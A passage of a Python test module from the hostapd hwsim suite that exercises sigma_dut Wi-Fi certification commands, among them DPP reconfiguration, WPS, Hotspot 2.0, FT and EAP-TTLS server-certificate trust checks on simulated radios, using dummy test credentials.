res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,DPPReconfigure,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPConfIndex,2,DPPListenChannel,6,DPPTimeout,6", timeout=10)
if "status,COMPLETE,ReconfigAuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected reconfiguration result: " + res)
ev = dev[1].wait_event(["DPP-CONF-RECEIVED"], timeout=15)
if ev is None:
raise Exception("DPP Config Response (reconfig) not received")
finally:
dev[0].set("dpp_config_processing", "0")
dev[1].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_reconfig_no_proto_ver(dev, apdev):
"""sigma_dut DPP reconfiguration (Configurator) - missing Protocol Version"""
run_sigma_dut_dpp_reconfig_proto(dev, apdev, "MissingAttribute")
def test_sigma_dut_dpp_reconfig_invalid_proto_ver(dev, apdev):
"""sigma_dut DPP reconfiguration (Configurator) - invalid Protocol Version"""
run_sigma_dut_dpp_reconfig_proto(dev, apdev, "InvalidValue")
def run_sigma_dut_dpp_reconfig_proto(dev, apdev, dpp_step):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[1].set("dpp_config_processing", "1")
id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
ifname = dev[0].ifname
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,DPP" % ifname)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPConfIndex,1,DPPBS,QR,DPPTimeout,6", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[0].dump_monitor()
ev = dev[1].wait_event(["DPP-NETWORK-ID"], timeout=1)
if ev is None:
raise Exception("No network profile created")
id = int(ev.split(' ')[1])
ev = dev[1].wait_event(["DPP-TX-STATUS"], timeout=5)
if ev is None:
raise Exception("Configuration Result not sent")
dev[1].dump_monitor()
cmd = "DPP_RECONFIG %d" % id
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start reconfiguration")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,DPPReconfigure,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPConfIndex,2,DPPStep,%s,DPPFrameType,ReconfigAuthRequest,DPPIEAttribute,ProtocolVersion,DPPListenChannel,6,DPPTimeout,6" % dpp_step, timeout=10)
if "status,COMPLETE,ReconfigAuthResult,Errorsent" not in res:
raise Exception("Unexpected reconfiguration result: " + res)
ev = dev[1].wait_event(["DPP-CONF-RECEIVED"], timeout=5)
if ev is not None:
raise Exception("DPP Config Response (reconfig) received unexpectedly")
finally:
dev[0].set("dpp_config_processing", "0")
dev[1].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_preconfigured_profile(dev, apdev):
"""sigma_dut controlled connection using preconfigured profile"""
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
params = hostapd.wpa2_params(ssid="test-psk", passphrase="12345678")
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-psk", psk="12345678", scan_freq="2412",
only_add_network=True)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s" % (ifname, "test-psk"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_wps_pbc(dev, apdev):
"""sigma_dut and WPS PBC Enrollee"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{"ssid": "wps", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
hapd.request("WPS_PBC")
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
cmd = "start_wps_registration,interface,%s" % ifname
cmd += ",WpsRole,Enrollee"
cmd += ",WpsConfigMethod,PBC"
sigma_dut_cmd_check(cmd, timeout=15)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
hapd.disable()
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
dev[0].flush_scan_cache()
def test_sigma_dut_sta_scan_bss(dev, apdev):
"""sigma_dut sta_scan_bss"""
hapd = hostapd.add_ap(apdev[0], {"ssid": "test"})
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "sta_scan_bss,Interface,%s,BSSID,%s" % (dev[0].ifname, \
hapd.own_addr())
res = sigma_dut_cmd(cmd, timeout=10)
if "ssid,test,bsschannel,1" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sta_scan_ssid_bssid(dev, apdev):
"""sigma_dut sta_scan GetParameter,SSID_BSSID"""
hostapd.add_ap(apdev[0], {"ssid": "abcdef"})
hostapd.add_ap(apdev[1], {"ssid": "qwerty"})
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "sta_scan,Interface,%s,GetParameter,SSID_BSSID" % dev[0].ifname
res = sigma_dut_cmd(cmd, timeout=10)
if "abcdef" not in res or "qwerty" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sta_scan_short_ssid(dev, apdev):
"""sigma_dut sta_scan ShortSSID"""
dev[0].flush_scan_cache()
ssid = "test-short-ssid-list"
hapd = hostapd.add_ap(apdev[0], {"ssid": ssid,
"ignore_broadcast_ssid": "1"})
bssid = apdev[0]['bssid']
payload = struct.pack('>L', binascii.crc32(ssid.encode()))
val = binascii.hexlify(payload).decode()
sigma = start_sigma_dut(dev[0].ifname)
found = False
try:
cmd = "sta_scan,Interface,%s,ChnlFreq,2412,ShortSSID,%s" % (dev[0].ifname, val)
for i in range(10):
sigma_dut_cmd_check(cmd, timeout=5)
ev = dev[0].wait_event(["CTRL-EVENT-SCAN-RESULTS"])
if ev is None:
raise Exception("Scan did not complete")
if bssid in dev[0].request("SCAN_RESULTS"):
found = True
break
finally:
stop_sigma_dut(sigma)
dev[0].request("VENDOR_ELEM_REMOVE 14 *")
if not found:
raise Exception("AP not found in scan results")
def test_sigma_dut_sta_scan_wait_completion(dev, apdev):
"""sigma_dut sta_scan WaitCompletion,1"""
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "sta_scan,Interface,%s,ChnlFreq,2412,WaitCompletion,1" % dev[0].ifname
res = sigma_dut_cmd(cmd, timeout=10)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_osen(dev, apdev, params):
"""sigma_dut controlled AP with OSEN"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_osen.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-hs20,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OSEN,PMF,Optional")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
# RSN-OSEN (for OSU)
dev[0].connect("test-hs20", proto="OSEN", key_mgmt="OSEN",
pairwise="CCMP", group="GTK_NOT_USED",
eap="WFA-UNAUTH-TLS", identity="[email protected]",
ca_cert="auth_serv/ca.pem", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_eap_osen(dev, apdev, params):
"""sigma_dut controlled AP with EAP+OSEN"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_eap_osen.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, bridge="ap-br0", hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-hs20,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-OSEN,PMF,Optional")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
subprocess.call(['brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
# RSN-OSEN (for OSU)
dev[0].connect("test-hs20", proto="OSEN", key_mgmt="OSEN",
pairwise="CCMP",
eap="WFA-UNAUTH-TLS", identity="[email protected]",
ca_cert="auth_serv/ca.pem", ieee80211w='2',
scan_freq="2412")
# RSN-EAP (for data connection)
dev[1].connect("test-hs20", key_mgmt="WPA-EAP", eap="TTLS",
identity="hs20-test", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
ieee80211w='2', scan_freq="2412")
hwsim_utils.test_connectivity(dev[0], dev[1], broadcast=False,
success_expected=False, timeout=1)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'],
stderr=open('/dev/null', 'w'))
subprocess.call(['brctl', 'delbr', 'ap-br0'],
stderr=open('/dev/null', 'w'))
def test_sigma_dut_ap_eap(dev, apdev, params):
"""sigma_dut controlled AP WPA2-Enterprise"""
logdir = os.path.join(params['logdir'], "sigma_dut_ap_eap.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-eap,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-eap", key_mgmt="WPA-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_eap_sha256(dev, apdev, params):
"""sigma_dut controlled AP WPA2-Enterprise SHA256"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_eap_sha256.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-eap,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-256")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-eap", key_mgmt="WPA-EAP-SHA256", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ft_eap(dev, apdev, params):
"""sigma_dut controlled AP FT-EAP"""
logdir = os.path.join(params['logdir'], "sigma_dut_ap_ft_eap.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-eap,MODE,11ng,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-EAP")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-ft-eap", key_mgmt="FT-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ft_psk(dev, apdev, params):
"""sigma_dut controlled AP FT-PSK"""
logdir = os.path.join(params['logdir'], "sigma_dut_ap_ft_psk.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-psk,MODE,11ng,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-PSK,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-ft-psk", key_mgmt="FT-PSK", psk="12345678",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ft_over_ds_psk(dev, apdev, params):
"""sigma_dut controlled AP FT-PSK (over-DS)"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_ft_over_ds_psk.sigma-hostapd")
conffile = os.path.join(params['logdir'],
"sigma_dut_ap_ft_over_ds_psk.sigma-conf")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-psk,MODE,11ng,DOMAIN,0101,FT_DS,Enable")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-PSK,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
dev[0].connect("test-ft-psk", key_mgmt="FT-PSK", psk="12345678",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ent_ft_eap(dev, apdev, params):
"""sigma_dut controlled AP WPA-EAP and FT-EAP"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_ent_ft_eap.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ent-ft-eap,MODE,11ng,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-FT-EAP")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-ent-ft-eap", key_mgmt="FT-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
dev[1].connect("test-ent-ft-eap", key_mgmt="WPA-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_venue_url(dev, apdev):
"""sigma_dut controlled Venue URL fetch"""
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "venue"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
venue_group = 1
venue_type = 13
venue_info = struct.pack('BB', venue_group, venue_type)
lang1 = "eng"
name1 = "Example venue"
lang2 = "fin"
name2 = "Esimerkkipaikka"
venue1 = struct.pack('B', len(lang1 + name1)) + lang1.encode() + name1.encode()
venue2 = struct.pack('B', len(lang2 + name2)) + lang2.encode() + name2.encode()
venue_name = binascii.hexlify(venue_info + venue1 + venue2)
url1 = "http://example.com/venue"
url2 = "https://example.org/venue-info/"
params["venue_group"] = str(venue_group)
params["venue_type"] = str(venue_type)
params["venue_name"] = [lang1 + ":" + name1, lang2 + ":" + name2]
params["venue_url"] = ["1:" + url1, "2:" + url2]
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required" % (ifname, "venue", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "venue"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_hs2_venue_info,interface," + ifname + ",Display,Yes")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_hs20_assoc_24(dev, apdev):
"""sigma_dut controlled Hotspot 2.0 connection (2.4 GHz)"""
run_sigma_dut_hs20_assoc(dev, apdev, True)
def test_sigma_dut_hs20_assoc_5(dev, apdev):
"""sigma_dut controlled Hotspot 2.0 connection (5 GHz)"""
run_sigma_dut_hs20_assoc(dev, apdev, False)
def run_sigma_dut_hs20_assoc(dev, apdev, band24):
hapd0 = None
hapd1 = None
try:
bssid0 = apdev[0]['bssid']
params = hs20_ap_params()
params['hessid'] = bssid0
hapd0 = hostapd.add_ap(apdev[0], params)
bssid1 = apdev[1]['bssid']
params = hs20_ap_params()
params['hessid'] = bssid0
params["hw_mode"] = "a"
params["channel"] = "36"
params["country_code"] = "US"
hapd1 = hostapd.add_ap(apdev[1], params)
band = "2.4" if band24 else "5"
exp_bssid = bssid0 if band24 else bssid1
run_sigma_dut_hs20_assoc_2(dev, apdev, band, exp_bssid)
finally:
dev[0].request("DISCONNECT")
if hapd0:
hapd0.request("DISABLE")
if hapd1:
hapd1.request("DISABLE")
subprocess.call(['iw', 'reg', 'set', '00'])
dev[0].flush_scan_cache()
def run_sigma_dut_hs20_assoc_2(dev, apdev, band, expect_bssid):
check_eap_capa(dev[0], "MSCHAPV2")
dev[0].flush_scan_cache()
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,HS2-R3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_add_credential,interface,%s,type,uname_pwd,realm,example.com,username,hs20-test,password,password" % ifname)
res = sigma_dut_cmd_check("sta_hs2_associate,interface,%s,band,%s" % (ifname, band),
timeout=15)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
if "BSSID," + expect_bssid not in res:
raise Exception("Unexpected BSSID: " + res)
def test_sigma_dut_ap_hs20(dev, apdev, params):
"""sigma_dut controlled AP with Hotspot 2.0 parameters"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_hs20.sigma-hostapd")
conffile = os.path.join(params['logdir'],
"sigma_dut_ap_hs20.sigma-conf")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,program,HS2-R3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,test-hs20,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,WLAN_TAG,1,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,WPA2-ENT")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,HESSID,02:12:34:56:78:9a,NAI_REALM_LIST,1,OPER_NAME,1")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,OSU_SERVER_URI,https://example.com/ https://example.org/,OSU_SSID,test-osu,OSU_METHOD,SOAP SOAP,OSU_PROVIDER_LIST,10,OSU_PROVIDER_NAI_LIST,4")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,NET_AUTH_TYPE,2")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,VENUE_NAME,1")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,DOMAIN_LIST,example.com")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,OPERATOR_ICON_METADATA,1")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,SSID,test-osu,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,NONE")
sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,2,OSU,1")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
with open("/tmp/sigma_dut-ap.conf", "rb") as f:
with open(conffile, "wb") as f2:
f2.write(f.read())
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_eap_ttls_uosc(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS with UOSC"""
logdir = params['logdir']
with open("auth_serv/ca.pem", "r") as f:
with open(os.path.join(logdir, "sigma_dut_eap_ttls_uosc.ca.pem"),
"w") as f2:
f2.write(f.read())
src = "auth_serv/server.pem"
dst = os.path.join(logdir, "sigma_dut_eap_ttls_uosc.server.der")
hashdst = os.path.join(logdir, "sigma_dut_eap_ttls_uosc.server.pem.sha256")
subprocess.check_call(["openssl", "x509", "-in", src, "-out", dst,
"-outform", "DER"],
stderr=open('/dev/null', 'w'))
with open(dst, "rb") as f:
der = f.read()
hash = hashlib.sha256(der).digest()
with open(hashdst, "w") as f:
f.write(binascii.hexlify(hash).decode())
dst = os.path.join(logdir, "sigma_dut_eap_ttls_uosc.incorrect.pem.sha256")
with open(dst, "w") as f:
f.write(32*"00")
ssid = "test-wpa2-eap"
params = hostapd.wpa2_eap_params(ssid=ssid)
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
try:
cmd = "sta_set_security,type,eapttls,interface,%s,ssid,%s,keymgmttype,wpa2,encType,AES-CCMP,PairwiseCipher,AES-CCMP-128,username,DOMAIN\mschapv2 user,password,password,ServerCert,sigma_dut_eap_ttls_uosc.incorrect.pem" % (ifname, ssid)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-TLS-CERT-ERROR"], timeout=10)
if ev is None:
raise Exception("Server certificate error not reported")
res = sigma_dut_cmd_check("dev_exec_action,program,WPA3,interface,%s,ServerCertTrust,Accept" % ifname)
if "ServerCertTrustResult,Accepted" not in res:
raise Exception("Server certificate trust was not accepted")
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev[0].dump_monitor()
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_eap_ttls_uosc_tod(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS with UOSC/TOD-STRICT"""
run_sigma_dut_eap_ttls_uosc_tod(dev, apdev, params, False)
def test_sigma_dut_eap_ttls_uosc_tod_tofu(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS with UOSC/TOD-TOFU"""
run_sigma_dut_eap_ttls_uosc_tod(dev, apdev, params, True)
def run_sigma_dut_eap_ttls_uosc_tod(dev, apdev, params, tofu):
check_tls_tod(dev[0])
logdir = params['logdir']
name = "sigma_dut_eap_ttls_uosc_tod"
if tofu:
name += "_tofu"
with open("auth_serv/ca.pem", "r") as f:
with open(os.path.join(logdir, name + ".ca.pem"), "w") as f2:
f2.write(f.read())
if tofu:
src = "auth_serv/server-certpol2.pem"
else:
src = "auth_serv/server-certpol.pem"
dst = os.path.join(logdir, name + ".server.der")
hashdst = os.path.join(logdir, name + ".server.pem.sha256")
subprocess.check_call(["openssl", "x509", "-in", src, "-out", dst,
"-outform", "DER"],
stderr=open('/dev/null', 'w'))
with open(dst, "rb") as f:
der = f.read()
hash = hashlib.sha256(der).digest()
with open(hashdst, "w") as f:
f.write(binascii.hexlify(hash).decode())
ssid = "test-wpa2-eap"
params = int_eap_server_params()
params["ssid"] = ssid
if tofu:
params["server_cert"] = "auth_serv/server-certpol2.pem"
params["private_key"] = "auth_serv/server-certpol2.key"
else:
params["server_cert"] = "auth_serv/server-certpol.pem"
params["private_key"] = "auth_serv/server-certpol.key"
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
try:
cmd = ("sta_set_security,type,eapttls,interface,%s,ssid,%s,keymgmttype,wpa2,encType,AES-CCMP,PairwiseCipher,AES-CCMP-128,trustedRootCA," + name + ".ca.pem,username,DOMAIN\mschapv2 user,password,password,ServerCert," + name + ".server.pem") % (ifname, ssid)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname + ",maintain_profile,1")
dev[0].wait_disconnected()
dev[0].dump_monitor()
hapd.disable()
params = hostapd.wpa2_eap_params(ssid=ssid)
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-TLS-CERT-ERROR"], timeout=10)
if ev is None:
raise Exception("Server certificate error not reported")
res = sigma_dut_cmd_check("dev_exec_action,program,WPA3,interface,%s,ServerCertTrust,Accept" % ifname)
if "ServerCertTrustResult,Accepted" in res:
raise Exception("Server certificate trust override was accepted unexpectedly")
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev[0].dump_monitor()
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_eap_ttls_uosc_initial_tod_strict(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS with initial UOSC/TOD-STRICT"""
run_sigma_dut_eap_ttls_uosc_initial_tod(dev, apdev, params, False)
def test_sigma_dut_eap_ttls_uosc_initial_tod_tofu(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS with initial UOSC/TOD-TOFU"""
run_sigma_dut_eap_ttls_uosc_initial_tod(dev, apdev, params, True)
def run_sigma_dut_eap_ttls_uosc_initial_tod(dev, apdev, params, tofu):
check_tls_tod(dev[0])
logdir = params['logdir']
name = params['name']
with open("auth_serv/rsa3072-ca.pem", "r") as f:
with open(params['prefix'] + ".ca.pem", "w") as f2:
f2.write(f.read())
if tofu:
src = "auth_serv/server-certpol2.pem"
else:
src = "auth_serv/server-certpol.pem"
dst = params['prefix'] + ".server.der"
hashdst = params['prefix'] + ".server.pem.sha256"
subprocess.check_call(["openssl", "x509", "-in", src, "-out", dst,
"-outform", "DER"],
stderr=open('/dev/null', 'w'))
with open(dst, "rb") as f:
der = f.read()
hash = hashlib.sha256(der).digest()
with open(hashdst, "w") as f:
f.write(binascii.hexlify(hash).decode())
ssid = "test-wpa2-eap"
params = int_eap_server_params()
params["ssid"] = ssid
if tofu:
params["server_cert"] = "auth_serv/server-certpol2.pem"
params["private_key"] = "auth_serv/server-certpol2.key"
else:
params["server_cert"] = "auth_serv/server-certpol.pem"
params["private_key"] = "auth_serv/server-certpol.key"
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
try:
